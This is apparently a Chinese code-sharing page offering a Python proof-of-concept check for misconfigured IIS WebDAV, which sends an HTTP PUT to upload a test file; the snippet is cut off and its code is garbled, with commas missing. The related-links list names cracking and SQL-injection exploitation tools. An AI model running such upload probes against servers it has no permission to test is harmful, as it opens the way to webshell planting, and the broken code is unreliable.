资源简介
name: IIS WebDav
info: "开启了WebDav且配置不当可导致攻击者直接上传webshell,进而导致服务器被入侵控制。
level: 紧急
type: 任意文件上传
repair: 禁用 IIS 的 WebDAV 服务
代码片段和文件信息
#!/usr/bin/env python
# -*- coding:utf-8 -*-
‘‘‘
name: IIS WebDav
info: “开启了WebDav且配置不当可导致攻击者直接上传webshell,进而导致服务器被入侵控制。
level: 紧急
type: 任意文件上传
repair: 禁用 IIS 的 WebDAV 服务
‘‘‘
import sysos
import socketurllib2time
from POC_framework import POC
class myPOC10(POC):
#单IP的POC
def check(self ip port timeout=5):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET socket.SOCK_STREAM)
s.connect((ip port))
flag = “PUT /vultest.txt HTTP/1.1\r\nHost: %s:%d\r\nContent-Length: 9\r\n\r\nscan\r\n\r\n“ % (ip port)
s.send(flag)
time.sleep(1)
data = s.rec - 上一篇:Tarcotron2(文本转语音)
- 下一篇:基于python的三层神经网络模型搭建
相关资源
- cs破解工具
- labelImg-1.8.1(图片标注工具)
- 缠论dll(czsc - 缠中说禅技术分析工具
- Tushare库打造股票筛选工具
- 自动截屏工具(python源码)
- QPA进程抓包工具
- Python其它开发工具的安装与使用.ppt
- Python 串口工具源码+.exe文件
- 蓝奏云批量上传工具.zip
- 图形识别与颜色识别工具
- 正方教务系统新版sql注入漏洞利用工
- QGIS的GeoHey-Toolbox-0.2纠偏工具
- 量化投资:以Python为工具,代码和数
- 基于python的FMU仿真工具
- Python-PyGradle使用Gradle来构建Python项目
- Python-stui允许从终端以图形方式监控
- python是个什么东西---python---pyqt做的一
- NeMo_脉冲神经网络工具_spiking neural n
- python 实现KML转换为Excel的工具
- PTVS 2.0 for VS2010
- 蜻蜓fm文件名还原逆还原工具qtfmr2.e
- PTVS 2.2 VS 2013 补充工具 自动提示功能
- python 截图 抓图 源码
- UHD+GNURadio安装工具 Python脚本以及安装
- python记账小工具.rar
- 贝叶斯网络工具箱-Python
- python反编译工具Easy Python Decompiler
- Python ip 代理池爬取工具
- IMU/GNSS开源仿真工具
- excel批量转换成txt文件的转换工具
川公网安备 51152502000135号
评论
共有 条评论